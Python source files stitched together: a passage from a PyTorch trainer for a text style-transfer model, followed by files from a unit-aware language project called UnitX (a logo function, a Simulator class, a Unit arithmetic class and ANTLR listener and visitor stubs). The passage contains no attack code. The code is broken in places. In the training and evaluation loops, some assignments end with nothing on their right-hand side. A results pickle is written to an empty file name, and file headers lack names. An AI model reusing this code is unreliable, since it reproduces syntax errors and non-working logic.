self.model.freeze_cls() # args.cls_weight = 0.05 # args.ca_weight = 0.0 # args.bt_weight = 1.0 self.use_caw_schedule = False del self.optimizer del self.scheduler if self.train_dataloader: params = [] for k, v in self.model.named_parameters(): # print("%s: %s" % (k, str(v.shape))) if "classifier" in k or "lm" in k: print("not optimize %s" % k) else: print("add params of %s to optimizer" % k) params.append(v) self.optimizer, self.scheduler\ = self.get_optimizer(params) # torch.autograd.set_detect_anomaly(True) self.clf_model = torch.load(args.cnn_clf_path).to(args.device) self.clf_model.eval() self.dev_ref_path_list = getattr(args, "dev_ref_path_list", None) self.test_ref_path_list = getattr(args, "test_ref_path_list", None) if self.test_ref_path_list is None: self.test_ref_path_list = self.args.ref_list print("self.dev_ref_path_list is") print(self.dev_ref_path_list) print("self.test_ref_path_list is") print(self.test_ref_path_list) if not self.args.use_bpe: self.dev_data_path_list = [ [os.path.join(self.args.data_dir, f"dev.{i}")] for i in range(2) ] self.test_data_path_list = [ [os.path.join(self.args.data_dir, f"test.{i}")] for i in range(2) ] else: self.dev_data_path_list = [ [os.path.join(self.args.data_dir, f"{i}")] for i in range(2) ] self.test_data_path_list = [ [os.path.join(self.args.data_dir, f"self_ref.test.{i}")] for i in range(2) ] print("self.dev_data_path_list is") print(self.dev_data_path_list) print("self.test_data_path_list is") print(self.test_data_path_list) def get_optimizer(self, params=None): args = self.args if params is None: print("return because params is None") return None, None # params = self.model.parameters() train_dataloader = self.train_dataloader optimizer = optimization.get_optim(args, params) num_steps = len(train_dataloader) * args.num_train_epochs // args.grad_accum_interval args.num_steps = num_steps print("Total number of steps: %d" % num_steps) decay_step = len(train_dataloader) * args.decay_epoch if args.decay_epoch > 0: print("Step when lr starts to decay: %d" % decay_step) scheduler = optimization.get_constant_schedule_with_linear_decay( optimizer, decay_step=decay_step, num_training_steps=num_steps ) else: scheduler = optimization.get_constant_schedule(optimizer) return optimizer, scheduler def train(self, train_dataloader=None): print("\n### TRAINING BEGINS ###") args = self.args model = self.model optimizer = self.optimizer scheduler = self.scheduler train_dataloader = train_dataloader if train_dataloader else self.train_dataloader model.train() loss_record = [] # loss at global_step 0, 1, 2 ... dev_metric_record = [] global_step_record_for_eval = [] global_step = 0 pad_id = args.pad_id grad_accum_interval = args.grad_accum_interval log_loss = 0.0 num_iters_per_epoch = len(train_dataloader) normalizer = min(num_iters_per_epoch, grad_accum_interval) cls_w = args.cls_weight print("cls_w is", cls_w) if self.use_caw_schedule: start = 0.0 stop = args.ca_weight ratio = 0.5 ca_w_list = lambda_schedule(args.num_steps, start=start, stop=stop, ratio=ratio) print(f"ca_w uses schedule (start={start}, stop={stop}, ratio={ratio})") ca_w = ca_w_list[0] else: ca_w = args.ca_weight print("ca_w is", ca_w) bt_w = args.bt_weight print("bt_w is", bt_w) model.zero_grad() if args.freeze_emb_at_beginning: model.freeze_emb() start_time = time.time() for ep in range(args.num_train_epochs): if ep == args.unfreeze_at_ep and args.freeze_emb_at_beginning: model.unfreeze_emb() for step, batch in enumerate(train_dataloader): src, lab, src_len = batch # print(f"ep:{ep}, step: {step}, src.shape[1] is", src.shape[1]) sorted_src_len, indices = torch.sort(src_len, dim=0, descending=True) sorted_src = torch.index_select(src, dim=0, index=indices) sorted_lab = torch.index_select(lab, dim=0, index=indices) sorted_src = sorted_src_len = sorted_lab = try: sorted_src_pad_mask = sorted_src==pad_id sorted_loss_tuple, sorted_output_tuple,\ sorted_algin = model(sorted_src, sorted_src_len, sorted_lab, sorted_src_pad_mask) sorted_rec_loss, sorted_bt_loss,\ sorted_src_cls_loss, sorted_soft_out_cls_loss,\ sorted_out_cls_loss, sorted_ca_loss = sorted_loss_tuple sorted_output, sorted_output_len = sorted_output_tuple rec_loss = sorted_rec_loss.mean() bt_loss = sorted_bt_loss.mean() src_cls_loss = sorted_src_cls_loss.mean() soft_out_cls_loss = sorted_soft_out_cls_loss.mean() out_cls_loss = sorted_out_cls_loss.mean() ca_loss = sorted_ca_loss.mean() loss = rec_loss + bt_w * bt_loss\ + cls_w * soft_out_cls_loss + ca_w * ca_loss loss /= normalizer loss.backward() if (step+1) % grad_accum_interval == 0 or\ (grad_accum_interval >= num_iters_per_epoch and (step+1) == num_iters_per_epoch): g = clip_grad_norm(model.parameters(), args.max_grad_norm) optimizer.step() scheduler.step() model.zero_grad() loss_record.append(log_loss) # global_step += 1 log_loss = 0.0 if global_step > 0 and global_step % args.log_interval == 0: print( f"epoch: {ep} "\ f"step: {global_step} "\ f"loss: {loss.item() * normalizer:.4f} "\ f"rec_loss: {rec_loss.item():.4f} "\ f"bt_loss: {bt_loss.item():.4f} "\ f"src_cls_loss: {src_cls_loss.item():.4f} "\ f"soft_out_cls_loss: {soft_out_cls_loss.item():.4f} "\ f"out_cls_loss: {out_cls_loss.item():.4f} "\ f"ca_loss: {ca_loss.item():.4f} "\ f"||g||: {g:.2f} "\ f"ca_w: {ca_w:.4f} "\ f"time: {misc.timeBetween(start_time, time.time())}" ) if global_step > 0 and global_step % args.eval_interval == 0: print("\neval model at step: %d" % global_step) checkpoint_output_dir = os.path.join(args.output_dir, "checkpoint-%d" % global_step) if not os.path.exists(checkpoint_output_dir): os.mkdir(checkpoint_output_dir) org_output_dir = args.output_dir args.output_dir = checkpoint_output_dir print("dev") dev_metric = self.evaluate() dev_metric_record.append(dev_metric) global_step_record_for_eval.append(global_step) args.output_dir = org_output_dir print("Save checkpoint at %s" % checkpoint_output_dir) self.save_checkpoint(checkpoint_output_dir) model.train() global_step += 1 if self.use_caw_schedule: ca_w = ca_w_list[global_step] else: log_loss += loss.item() except RuntimeError as e: if 'out of memory' in str(e): print('|| WARNING: ran out of memory ||\n') if hasattr(torch.cuda, 'empty_cache'): torch.cuda.empty_cache() else: print('|| WARNING: fail to train ||\n') raise e raise e # gpu_profile(frame=sys._getframe(), event='line', arg=None) print("### TRAINING ENDS ###\n") print("\neval model at step: %d" % global_step) checkpoint_output_dir = os.path.join(args.output_dir, "checkpoint-%d" % global_step) if not os.path.exists(checkpoint_output_dir): os.mkdir(checkpoint_output_dir) org_output_dir = args.output_dir args.output_dir = checkpoint_output_dir print("dev") dev_metric = self.evaluate() dev_metric_record.append(dev_metric) global_step_record_for_eval.append(global_step) args.output_dir = org_output_dir print("Save checkpoint at %s" % checkpoint_output_dir) self.save_checkpoint(checkpoint_output_dir) train_record = loss_record eval_record = (dev_metric_record, global_step_record_for_eval) with open(os.path.join(args.output_dir, ""), "wb") as f: pickle.dump({"train": train_record, "eval": eval_record}, f) self.save_train_result(train_record, eval_record) return train_record, eval_record def evaluate(self, eval_dataloader=None, data_path_list=None, ref_path_list=None, data_name="dev"): eval_dataloader = eval_dataloader if eval_dataloader else self.dev_dataloader ref_path_list = ref_path_list if ref_path_list else self.dev_ref_path_list data_path_list = data_path_list if data_path_list else self.dev_data_path_list args = self.args model = self.model tokenizer = self.tokenizer clf_model = self.clf_model model.eval() num_data = 0 total_loss = 0 total_rec_loss = 0 total_bt_loss = 0 total_src_cls_loss = 0 total_soft_out_cls_loss = 0 total_out_cls_loss = 0 total_ca_loss = 0 outputs_list = [] outputs_len_list = [] lab_list = [] clf_preds_list = [] cls_w = args.cls_weight ca_w = args.ca_weight bt_w = args.bt_weight pad_id = args.pad_id start_time = time.time() with torch.no_grad(): for step, batch in enumerate(eval_dataloader): src, lab, src_len = batch num_data += src.shape[0] # print(f"ep:{ep}, step: {step}, src.shape[1] is", src.shape[1]) sorted_src_len, indices = torch.sort(src_len, dim=0, descending=True) _, resorted_indices = torch.sort(indices, dim=0) sorted_src = torch.index_select(src, dim=0, index=indices) sorted_lab = torch.index_select(lab, dim=0, index=indices) sorted_src = sorted_src_len = sorted_lab = resorted_indices = try: sorted_src_pad_mask = sorted_src==pad_id sorted_loss_tuple, sorted_outputs_tuple,\ sorted_algin = model(sorted_src, sorted_src_len, sorted_lab, sorted_src_pad_mask) sorted_rec_loss, sorted_bt_loss,\ sorted_src_cls_loss, sorted_soft_out_cls_loss,\ sorted_out_cls_loss, sorted_ca_loss = sorted_loss_tuple sorted_outputs, sorted_outputs_len = sorted_outputs_tuple # shape of sorted_outputs is [batch_size, max_len] outputs = torch.index_select(sorted_outputs, dim=0, index=resorted_indices) outputs_len = torch.index_select(sorted_outputs_len, dim=0, index=resorted_indices) clf_preds = torch.argmax(clf_model(outputs), dim=-1) rec_loss = sorted_rec_loss.sum() bt_loss = sorted_bt_loss.sum() src_cls_loss = sorted_src_cls_loss.sum() soft_out_cls_loss = sorted_soft_out_cls_loss.sum() out_cls_loss = sorted_out_cls_loss.sum() ca_loss = sorted_ca_loss.sum() loss = rec_loss + bt_w * bt_loss\ + cls_w * soft_out_cls_loss + ca_w * ca_loss total_rec_loss += rec_loss.item() total_bt_loss += bt_loss.item() total_src_cls_loss += src_cls_loss.item() total_soft_out_cls_loss += soft_out_cls_loss.item() total_out_cls_loss += out_cls_loss.item() total_ca_loss += ca_loss.item() total_loss += loss.item() outputs_list.extend( [x.squeeze(0) for x in torch.split(outputs, split_size_or_sections=1, dim=0)] ) outputs_len_list.extend( [x.squeeze(0) for x in torch.split(outputs_len, split_size_or_sections=1, dim=0)] ) lab_list.extend( [x.squeeze(0) for x in torch.split(lab, split_size_or_sections=1, dim=0)] ) clf_preds_list.extend( [x.squeeze(0).item() for x in torch.split(clf_preds, split_size_or_sections=1, dim=0)] ) except RuntimeError as e: if 'out of memory' in str(e): print('|| WARNING: ran out of memory ||\n') if hasattr(torch.cuda, 'empty_cache'): torch.cuda.empty_cache() else: print('|| WARNING: fail to train ||\n') raise e eval_loss = total_loss / num_data eval_rec_loss = total_rec_loss / num_data eval_bt_loss = total_bt_loss / num_data eval_src_cls_loss = total_src_cls_loss / num_data eval_soft_out_cls_loss = total_soft_out_cls_loss / num_data eval_out_cls_loss = total_out_cls_loss / num_data eval_ca_loss = total_ca_loss / num_data inv_lab_list = 1-np.array(lab_list) # print("clf_preds_list is") # print(clf_preds_list) eval_acc = accuracy_score(inv_lab_list, np.array(clf_preds_list)) * 100.0 transfer_file_names = [ os.path.join(args.output_dir, f"{data_name}.0.tsf"), os.path.join(args.output_dir, f"{data_name}.1.tsf") ] transfer_files = [ open(transfer_file_names[0], 'w'), open(transfer_file_names[1], 'w') ] count = 0 # print(f"len(outputs_list): {len(outputs_list)}, len(outputs_len_list): {len(outputs_len_list)}") for output, output_len, l in zip(outputs_list, outputs_len_list, lab_list): # print("output is", output) text = tokenizer.decode(output, include_sos_eos=False) if output_len < args.max_decoding_len: pass if args.use_bpe: text = text.replace("@@ ", "") text = text.strip("@@") transfer_files[l].write(text+'\n') count += 1 transfer_files[0].close() transfer_files[1].close() try: assert count == num_data except: print(f"count: {count}, total_num: {num_data}") raise RuntimeError() bleu_evaluator = BLEUEvaluator() if ref_path_list is not None: bleu_score_021 = bleu_evaluator.score(ref_path_list[0], transfer_file_names[0]) bleu_score_120 = bleu_evaluator.score(ref_path_list[1], transfer_file_names[1]) bleu_score = (bleu_score_021 + bleu_score_120) / 2 else: bleu_score = None if data_path_list is not None: self_bleu_score_021 = bleu_evaluator.score(data_path_list[0], transfer_file_names[0]) self_bleu_score_120 = bleu_evaluator.score(data_path_list[1], transfer_file_names[1]) self_bleu_score = (self_bleu_score_021 + self_bleu_score_120) / 2 else: self_bleu_score = None print("==============================") if ref_path_list is not None: print( f"BLEU: {bleu_score:.4f} "\ f"(0->1:{bleu_score_021:.4f}, 1->0:{bleu_score_120:.4f}) ", end='', ) if data_path_list is not None: print( f"self-BLEU: {self_bleu_score:.4f} "\ f"(0->1:{self_bleu_score_021:.4f}, 1->0:{self_bleu_score_120:.4f}) ", end='', ) print( f"acc: {eval_acc:.4f}\n"\ f"loss: {eval_loss:.4f} "\ f"rec_loss: {eval_rec_loss:.4f} "\ f"bt_loss: {eval_bt_loss:.4f} "\ f"src_cls_loss: {eval_src_cls_loss:.4f} "\ f"soft_out_cls_loss: {eval_soft_out_cls_loss:.4f} "\ f"out_cls_loss: {eval_out_cls_loss:.4f} "\ f"ca_loss: {eval_ca_loss:.4f} "\ f"time: {misc.timeBetween(start_time, time.time())}" ) print("==============================\n") return (bleu_score, self_bleu_score, eval_acc) def test(self, test_dataloader=None, data_path_list=None, ref_path_list=None): test_dataloader = test_dataloader if test_dataloader else self.test_dataloader ref_path_list = ref_path_list if ref_path_list else self.test_ref_path_list data_path_list = data_path_list if data_path_list else self.test_data_path_list return self.evaluate(test_dataloader, data_path_list, ref_path_list, "test") def save_train_result(self, train_record, eval_record): args = self.args train_loss_record = train_record dev_metric_record, eval_gs_record = eval_record dev_unzip = list(zip(*dev_metric_record)) dev_bleu_record, dev_self_bleu_record, dev_acc_record = np.array(dev_unzip[0]),\ np.array(dev_unzip[1]), np.array(dev_unzip[2]) if (dev_bleu_record!=None).all(): best_dev_bleu = np.max(dev_bleu_record) step_of_best_dev_bleu = eval_gs_record[np.argmax(dev_bleu_record)] print("best dev BLEU: %.4f in step %d" % (best_dev_bleu, step_of_best_dev_bleu)) fig = plt.figure() ax_1 = fig.add_subplot(111) ax_2 = ax_1.twinx() ax_1.set_xlabel("step") ax_1.set_ylabel("(self-)BLEU") ax_2.set_ylabel("Acc") line_list = [] line_label_list = [] if (dev_bleu_record!=None).all(): # l, = ax_1.plot(eval_gs_record, dev_bleu_record, '-', c='#1f77b4', label="dev BLEU") l, = ax_1.plot(eval_gs_record, dev_bleu_record, '-', c='#1f77b4') line_list.append(l) line_label_list.append("dev BLEU") # l, = ax_1.plot(eval_gs_record, dev_self_bleu_record, ':', c='#1f77b4', label="dev self-BLEU") l, = ax_1.plot(eval_gs_record, dev_self_bleu_record, ':', c='#1f77b4') line_list.append(l) line_label_list.append("dev self-BLEU") # l, = ax_2.plot(eval_gs_record, dev_acc_record, '--', c='#1f77b4', label="dev acc") l, = ax_2.plot(eval_gs_record, dev_acc_record, '--', c='#1f77b4') line_list.append(l) line_label_list.append("dev acc") plt.legend(line_list, line_label_list) plt.tight_layout() plt.savefig(os.path.join(args.output_dir, "bleu_and_acc.pdf"), format='pdf') # bbox_inches='tight' plt.close() plt.figure() plt.xlabel("step") plt.ylabel("loss") plt.plot(list(range(len(train_loss_record))), train_loss_record) # plt.plot(eval_gs_record, eval_loss_record) plt.tight_layout() plt.savefig(os.path.join(args.output_dir, "loss.pdf"), format='pdf') plt.close() ```
{ "source": "0ED/UnitX", "score": 3 }
#### File: UnitX/src/ ```python def get_line(): """Gets a string of logo for intaractive run. Returns: A string of logo. Advice: Use a command for generating LOGO. $ figlet -kw 120 -f slant UnitX $ jp2a -i --width=30 --chars=" XY" --output=sample.txt unit_logo.jpg """ import time now_time = time.ctime(time.time()) ascii_art = """\ __ __ _ __ _ __ / / / /____ (_)/ /_| |/ / / / / // __ \ / // __/| / / /_/ // / / // // /_ / | \____//_/ /_//_/ \__//_/|_| """ unitx_info = """\ UnitX 0.7.0 (%s)""" % (now_time) #Type "help" or "demo <number(0-2)>" for UnitX life. console_info = ascii_art + unitx_info return console_info if __name__ == '__main__': print get_line() """LOGO memo ______ ____ / \_ / \——-| \ / \ | | |_ \ |________ / ____| / / /\__/ / __ | | / \_ \__________ | | \ | |____| |____________| __ __ _ __ _ __ / / / /____ (_)/ /_| |/ / / / / // __ \ / // __/| / / /_/ // / / // // /_ / | \____//_/ /_//_/ \__//_/|_| """ ``` #### File: UnitX/unitx/ ```python import sys import os from unitx_object import UnitXObject from unit_manager import UnitManager from scope_list import ScopeList from constants import Constants class Simulator(object): """A class simulating a scope and a manager. Attributes: __scopes: An instance indicating a ScopeList class (a list structure). __manager: An instance indicating a UnitManager class. """ def __init__(self): """Inits and sets a unit manager and a scope list.""" this_dir, _ = os.path.split(__file__) data_path = os.path.join(this_dir, Constants.SYSTEM_UNIT_DATA) self.__manager = UnitManager(data_path) self.__scopes = ScopeList() def get_scopes(self): """Returns scopes for saving variables. Returns: An instance indicating a ScopeList class (a list structure). """ return self.__scopes def get_manager(self): """Returns a unit manager. Returns: An instance indicating a UnitManager class. """ return self.__manager def main(): """Run an example for a Unit class.""" from simulator import Simulator s = Simulator() print s.get_scopes() s.get_scopes().del_scope() print s.get_scopes() if __name__ == '__main__': sys.exit(main()) ``` #### File: UnitX/unitx/ ```python import sys from collegue import Collegue from constants import Constants class Unit(Collegue): """A class which has an infomation of a unit. And this class can calculate between units by a function which this class has. Attributes: ex_numer: A string indicating a numer of unit which used in the past. numer: A string indicating a current numer. ex_denom: A string indicating a denom of unit which used in the past. denom: A string indicating a current denom. token: An instance of Token class indicating the head of a unit statement. Examples: {MB}, {kg->g}, {m/s}, {km->m}, {km->m/s->h} A data structure: { <ex_numer> -> <numer> / <ex_denom> -> <denom> } """ def __init__(self, ex_numer=None, numer=None, ex_denom=None, denom=None, token=None): """Inits attributes of a Unit class.""" self.token = token self.ex_numer = ex_numer self.numer = numer self.ex_denom = ex_denom self.denom = denom def replace_tokens(self): """Replaces unit tokens to new unit tokens by finding in scopes.""" tokens = [self.ex_numer, self.numer, self.ex_denom, self.denom] new_tokens = [] for t in tokens: found_scope = self.mediator.get_scopes().peek().find_scope_of(t) if found_scope: unitx_obj = found_scope[t] new_tokens.append(unitx_obj.get_value()) else: new_tokens.append(t) self.ex_numer, self.numer, self.ex_denom, self.denom = new_tokens return def remove_ex(self): """Removes varibles of ex_numer and ex_denom which don't need for displaying on CLI. """ self.ex_numer = self.ex_denom = None return def is_empty(self): """Returns whether attributes of Unit are an empty. Returns: A bool indicating whether attributes of Unit are an empty. """ return self.ex_numer == self.numer == self.ex_denom == self.denom == None def __notifyEasily(self, unit, opp_token): """Notify an error(notifyErrorListeners) easily. Args: self: An instance indicating a Unit class which probably has an error. unit: An instance indicating a Unit class which probably has an error. opp_token: An instance indicating a Token class reporting an error on the listener(EvalErrorListener). Raises: TypeError: An error occurred by a difference of a unit type. """ msg = Constants.TYPE_ERR_UNSUPPORTED_UNIT % (opp_token.text, self.formal_str(), unit.formal_str()) self.mediator.get_parser().notifyErrorListeners(msg, opp_token, Exception(msg)) return def add(self, unit, opp_token): """Returns a unit added self and unit. Args: self: An instance indicating a Unit class. unit: An instance indicating a Unit class. opp_token: An instance indicating a Token class reporting an error on the listener(EvalErrorListener). Examples: <self> + <unit> -> <result> {km} + {} -> {km} {km} + {km} -> {km} {km/s} + {km/s} -> {km/s} """ if self.numer == unit.numer and self.denom == unit.denom: return self elif self.is_empty(): return unit elif unit.is_empty(): return self else: self.__notifyEasily(unit, opp_token) return def subtract(self, unit, opp_token): """Returns a unit subtracted self and unit. Args: self: An instance indicating a Unit class. unit: An instance indicating a Unit class. opp_token: An instance indicating a Token class reporting an error on the listener(EvalErrorListener). Examples: <self> - <unit> -> <result> {km} - {} -> {km} {km} - {km} -> {km} {km/s} - {km/s} -> {km/s} """ return self.add(unit, opp_token) def multiply(self, unit, opp_token): """Returns a unit multiplied self and unit. Args: self: An instance indicating a Unit class. unit: An instance indicating a Unit class. opp_token: An instance indicating a Token class reporting an error on the listener(EvalErrorListener). Examples: <self> * <unit> -> <result> {km} * {} -> {km} {km/s} * {s} -> {km} """ if self.numer == unit.denom: return Unit(numer=unit.numer) elif self.denom == unit.numer: return Unit(numer=self.numer) elif self.is_empty(): return unit elif unit.is_empty(): return self else: self.__notifyEasily(unit, opp_token) return def divide(self, unit, opp_token): """Returns a unit divided self and unit. Args: self: An instance indicating a Unit class. unit: An instance indicating a Unit class. opp_token: An instance indicating a Token class reporting an error on the listener(EvalErrorListener). Examples: <self> / <unit> -> <result> {km} / {km} -> {} {km} / {s} -> {km/s} {km} / {km/s} -> {s} """ if self.numer == unit.numer and self.denom == unit.denom: return Unit() elif (not self.denom) and self.numer == unit.numer: return Unit(numer=unit.denom) elif self.is_empty(): return unit elif unit.is_empty(): return self else: self.__notifyEasily(unit, opp_token) return def modulo(self, unit, opp_token): """Returns a unit calculated a modulo of self and unit. Args: self: An instance indicating a Unit class. unit: An instance indicating a Unit class. opp_token: An instance indicating a Token class reporting an error on the listener(EvalErrorListener). Examples: <self> % <unit> -> <result> {km} % {km} -> {} {km} % {s} -> {km/s} {km} % {km/s} -> {s} """ return self.divide(unit, opp_token) def equals(self, unit): """Returns whether self unit equals a unit of arguments. Returns: A bool indicating whether self unit equals a unit of arguments. """ return self.numer == unit.numer and self.denom == unit.denom def formal_str(self): """Returns a formal string displaying on CLI. Returns: A string displaying on CLI. """ if self.numer and self.denom: return '{%s/%s}' % (self.numer, self.denom) elif self.numer and not self.denom: return '{%s}' % (self.numer) else: return '' def __unicode__(self): """Returns a string of attributes. Returns: res: A string of attributes infomations. """ res = "<%s: {%s->%s/%s->%s}>" % (self.__class__.__name__, self.ex_numer, self.numer, self.ex_denom, self.denom) return res def __str__(self): """Returns an encoded string of attributes. Returns: An encoded string of attributes. """ return unicode(self).encode('utf-8') def __repr__(self): """Returns a string of attributes. Returns: A string of a result of a __str__() function. """ return self.__str__() @classmethod def set_mediator(self, mediator): """Sets a mediator for Mediator pattern of GoF. Args: mediator: An instance of a EvalVisitor class inherited Mediator class. """ self.mediator = mediator return def main(): """Run an example for a Unit class.""" # # Checks printing a Unit object. # print Unit(u'分', u'時', None, None) print Unit(u'm', u'km', None, u'時') # # add() demo # print '-' * 10 opp_token = None left, right = Unit(None, u'km', None, u'時'), Unit(None, u'km', None, u'時') print "%s + %s -> %s" % (left.formal_str(), right.formal_str(), left.add(right, opp_token).formal_str()) # # subtract() demo # print '-' * 10 left, right = Unit(None, u'km', None, u'時'), Unit(None, u'km', None, u'時') print "%s - %s -> %s" % (left.formal_str(), right.formal_str(), left.subtract(right, opp_token).formal_str()) # # multiply() demo # print '-' * 10 left, right = Unit(None, u'km', None, u'時'), Unit(None, u'時', None, None) print "%s * %s -> %s" % (left.formal_str(), right.formal_str(), left.multiply(right, opp_token).formal_str()) left, right = Unit(None, u'km', None, None), Unit(None, None, None, None) print "%s * %s -> %s" % (left.formal_str(), right.formal_str(), left.multiply(right, opp_token).formal_str()) left, right = Unit(None, None, None, None), Unit(None, u'km', None, u'時') print "%s * %s -> %s" % (left.formal_str(), right.formal_str(), left.multiply(right, opp_token).formal_str()) #left, right = Unit(None, u'km', None, u'時'), Unit(None, u'km', None, u'時') #print "%s * %s -> %s" % (left.formal_str(), right.formal_str(), left.multiply(right, opp_token)) #error # # divide() demo # print '-' * 10 left, right = Unit(None, u'km', None, None), Unit(None, u'km', None, u'時') print "%s / %s -> %s" % (left.formal_str(), right.formal_str(), left.divide(right, opp_token).formal_str()) left, right = Unit(None, u'km', None, u'時'), Unit(None, u'km', None, u'時') print "%s / %s -> %s" % (left.formal_str(), right.formal_str(), left.divide(right, opp_token).formal_str()) left, right = Unit(None, u'km', None, None), Unit(None, u'km', None, None) print "%s / %s -> %s" % (left.formal_str(), right.formal_str(), left.divide(right, opp_token).formal_str()) left, right = Unit(None, u'km', None, None), Unit(None, None, None, None) print "%s / %s -> %s" % (left.formal_str(), right.formal_str(), left.divide(right, opp_token).formal_str()) #left, right = Unit(None, u'km', None, u'時'), Unit(None, u'時', None, None) #print "%s / %s -> %s" % (left.formal_str(), right.formal_str(), left.divide(right, opp_token)) #error return Constants.EXIT_SUCCESS if __name__ == '__main__': sys.exit(main()) ``` #### File: UnitX/unitx/ ```python from antlr4 import * # This class defines a complete listener for a parse tree produced by UnitXParser. class UnitXListener(ParseTreeListener): # Enter a parse tree produced by UnitXParser#program. def enterProgram(self, ctx): pass # Exit a parse tree produced by UnitXParser#program. def exitProgram(self, ctx): pass # Enter a parse tree produced by UnitXParser#typeDeclaration. def enterTypeDeclaration(self, ctx): pass # Exit a parse tree produced by UnitXParser#typeDeclaration. def exitTypeDeclaration(self, ctx): pass # Enter a parse tree produced by UnitXParser#functionDeclaration. def enterFunctionDeclaration(self, ctx): pass # Exit a parse tree produced by UnitXParser#functionDeclaration. def exitFunctionDeclaration(self, ctx): pass # Enter a parse tree produced by UnitXParser#formalParameters. def enterFormalParameters(self, ctx): pass # Exit a parse tree produced by UnitXParser#formalParameters. def exitFormalParameters(self, ctx): pass # Enter a parse tree produced by UnitXParser#formalParameterList. def enterFormalParameterList(self, ctx): pass # Exit a parse tree produced by UnitXParser#formalParameterList. def exitFormalParameterList(self, ctx): pass # Enter a parse tree produced by UnitXParser#formalParameter. def enterFormalParameter(self, ctx): pass # Exit a parse tree produced by UnitXParser#formalParameter. def exitFormalParameter(self, ctx): pass # Enter a parse tree produced by UnitXParser#block. def enterBlock(self, ctx): pass # Exit a parse tree produced by UnitXParser#block. def exitBlock(self, ctx): pass # Enter a parse tree produced by UnitXParser#blockStatement. def enterBlockStatement(self, ctx): pass # Exit a parse tree produced by UnitXParser#blockStatement. def exitBlockStatement(self, ctx): pass # Enter a parse tree produced by UnitXParser#statement. def enterStatement(self, ctx): pass # Exit a parse tree produced by UnitXParser#statement. def exitStatement(self, ctx): pass # Enter a parse tree produced by UnitXParser#repStatement. def enterRepStatement(self, ctx): pass # Exit a parse tree produced by UnitXParser#repStatement. def exitRepStatement(self, ctx): pass # Enter a parse tree produced by UnitXParser#ifStatement. def enterIfStatement(self, ctx): pass # Exit a parse tree produced by UnitXParser#ifStatement. def exitIfStatement(self, ctx): pass # Enter a parse tree produced by UnitXParser#expressionStatement. def enterExpressionStatement(self, ctx): pass # Exit a parse tree produced by UnitXParser#expressionStatement. def exitExpressionStatement(self, ctx): pass # Enter a parse tree produced by UnitXParser#printStatement. def enterPrintStatement(self, ctx): pass # Exit a parse tree produced by UnitXParser#printStatement. def exitPrintStatement(self, ctx): pass # Enter a parse tree produced by UnitXParser#assertStatement. def enterAssertStatement(self, ctx): pass # Exit a parse tree produced by UnitXParser#assertStatement. def exitAssertStatement(self, ctx): pass # Enter a parse tree produced by UnitXParser#dumpStatement. def enterDumpStatement(self, ctx): pass # Exit a parse tree produced by UnitXParser#dumpStatement. def exitDumpStatement(self, ctx): pass # Enter a parse tree produced by UnitXParser#borderStatement. def enterBorderStatement(self, ctx): pass # Exit a parse tree produced by UnitXParser#borderStatement. def exitBorderStatement(self, ctx): pass # Enter a parse tree produced by UnitXParser#expressionList. def enterExpressionList(self, ctx): pass # Exit a parse tree produced by UnitXParser#expressionList. def exitExpressionList(self, ctx): pass # Enter a parse tree produced by UnitXParser#parExpression. def enterParExpression(self, ctx): pass # Exit a parse tree produced by UnitXParser#parExpression. def exitParExpression(self, ctx): pass # Enter a parse tree produced by UnitXParser#repControl. def enterRepControl(self, ctx): pass # Exit a parse tree produced by UnitXParser#repControl. def exitRepControl(self, ctx): pass # Enter a parse tree produced by UnitXParser#endRep. def enterEndRep(self, ctx): pass # Exit a parse tree produced by UnitXParser#endRep. def exitEndRep(self, ctx): pass # Enter a parse tree produced by UnitXParser#expression. def enterExpression(self, ctx): pass # Exit a parse tree produced by UnitXParser#expression. def exitExpression(self, ctx): pass # Enter a parse tree produced by UnitXParser#unit. def enterUnit(self, ctx): pass # Exit a parse tree produced by UnitXParser#unit. def exitUnit(self, ctx): pass # Enter a parse tree produced by UnitXParser#unitSingleOrPairOperator. def enterUnitSingleOrPairOperator(self, ctx): pass # Exit a parse tree produced by UnitXParser#unitSingleOrPairOperator. def exitUnitSingleOrPairOperator(self, ctx): pass # Enter a parse tree produced by UnitXParser#unitOperator. def enterUnitOperator(self, ctx): pass # Exit a parse tree produced by UnitXParser#unitOperator. def exitUnitOperator(self, ctx): pass # Enter a parse tree produced by UnitXParser#primary. def enterPrimary(self, ctx): pass # Exit a parse tree produced by UnitXParser#primary. def exitPrimary(self, ctx): pass # Enter a parse tree produced by UnitXParser#literal. def enterLiteral(self, ctx): pass # Exit a parse tree produced by UnitXParser#literal. def exitLiteral(self, ctx): pass # Enter a parse tree produced by UnitXParser#string. def enterString(self, ctx): pass # Exit a parse tree produced by UnitXParser#string. def exitString(self, ctx): pass # Enter a parse tree produced by UnitXParser#halfString. def enterHalfString(self, ctx): pass # Exit a parse tree produced by UnitXParser#halfString. def exitHalfString(self, ctx): pass # Enter a parse tree produced by UnitXParser#number. def enterNumber(self, ctx): pass # Exit a parse tree produced by UnitXParser#number. def exitNumber(self, ctx): pass # Enter a parse tree produced by UnitXParser#integer. def enterInteger(self, ctx): pass # Exit a parse tree produced by UnitXParser#integer. def exitInteger(self, ctx): pass # Enter a parse tree produced by UnitXParser#boolean. def enterBoolean(self, ctx): pass # Exit a parse tree produced by UnitXParser#boolean. def exitBoolean(self, ctx): pass # Enter a parse tree produced by UnitXParser#none. def enterNone(self, ctx): pass # Exit a parse tree produced by UnitXParser#none. def exitNone(self, ctx): pass ``` #### File: UnitX/unitx/ ```python from antlr4 import * # This class defines a complete generic visitor for a parse tree produced by UnitXParser. class UnitXVisitor(ParseTreeVisitor): # Visit a parse tree produced by UnitXParser#program. def visitProgram(self, ctx): return self.visitChildren(ctx) # Visit a parse tree produced by UnitXParser#typeDeclaration. def visitTypeDeclaration(self, ctx): return self.visitChildren(ctx) # Visit a parse tree produced by UnitXParser#functionDeclaration. def visitFunctionDeclaration(self, ctx): return self.visitChildren(ctx) # Visit a parse tree produced by UnitXParser#formalParameters. def visitFormalParameters(self, ctx): return self.visitChildren(ctx) # Visit a parse tree produced by UnitXParser#formalParameterList. def visitFormalParameterList(self, ctx): return self.visitChildren(ctx) # Visit a parse tree produced by UnitXParser#formalParameter. def visitFormalParameter(self, ctx): return self.visitChildren(ctx) # Visit a parse tree produced by UnitXParser#block. def visitBlock(self, ctx): return self.visitChildren(ctx) # Visit a parse tree produced by UnitXParser#blockStatement. def visitBlockStatement(self, ctx): return self.visitChildren(ctx) # Visit a parse tree produced by UnitXParser#statement. def visitStatement(self, ctx): return self.visitChildren(ctx) # Visit a parse tree produced by UnitXParser#repStatement. def visitRepStatement(self, ctx): return self.visitChildren(ctx) # Visit a parse tree produced by 